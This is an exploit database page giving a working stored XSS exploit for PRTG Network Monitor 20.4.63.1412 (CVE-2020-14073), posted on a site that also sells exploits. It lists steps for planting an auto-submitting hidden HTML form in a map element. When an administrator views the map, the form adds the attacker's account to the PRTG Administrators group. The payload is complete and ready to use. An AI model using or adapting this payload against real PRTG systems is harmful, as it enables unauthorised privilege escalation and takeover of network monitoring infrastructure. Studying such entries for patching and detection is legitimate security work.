0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PRTG Network Monitor 20.4.63.1412 - (maps) Stored XSS Vulnerability
Author
Risk
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS # Exploit Author: Amin Rawah # Vendor Homepage: https://www.paessler.com/prtg # Software Link: https://www.paessler.com/prtg # Version: 20.4.63.1412 x64 # Tested on: Windows # CVE : CVE-2020-14073 Description: Since there is a stored XSS affecting 'maps' in the system, a malicious user can escalte his/her privilege to PRTG Administrator. Steps: 1- Login to PRTG system and view source code (currentUserId) 2- Create a map, add an element, double click the element and modify the HTML section 'HTML After' 3- In 'HTML After' add the following code: <form action="http://<PRTG_SERVER>:8081/editsettings" method="POST" enctype="multipart/form-data"> <input type="hidden" name="name_" value="PRTG Administrators" /> <input type="hidden" name="defaulthome_" value="/welcome.htm" /> <input type="hidden" name="isadgroup" value="0" /> <input type="hidden" name="adusertype_" value="0" /> <input type="hidden" name="aduserack_" value="0" /> <input type="hidden" name="users_" value="1" /> <input type="hidden" name="users_" value="1" /> <input type="hidden" name="users__check" value="<currentUserId>|<YOUR_USERNAME>|" /> <input type="hidden" name="users__check" value="100|PRTG System Administrator|" /> <input type="hidden" name="id" value="200" /> <input type="hidden" name="targeturl" value="/systemsetup.htm?tabid=6" /> <input type="submit" value="Submit request" /> </form> <svg/onload='document.forms[0].submit()'/> 4- Save and share the link with PRTG Administrator. 5- Login with the highest privilege. # 0day.today [2024-07-07] #